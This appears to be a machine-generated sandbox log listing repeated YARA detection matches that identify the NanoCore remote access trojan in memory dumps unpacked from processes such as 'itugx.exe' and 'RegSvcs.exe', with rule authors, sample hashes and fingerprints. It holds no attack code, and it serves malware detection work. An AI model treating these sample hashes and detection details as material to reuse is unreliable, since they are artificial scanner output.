Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
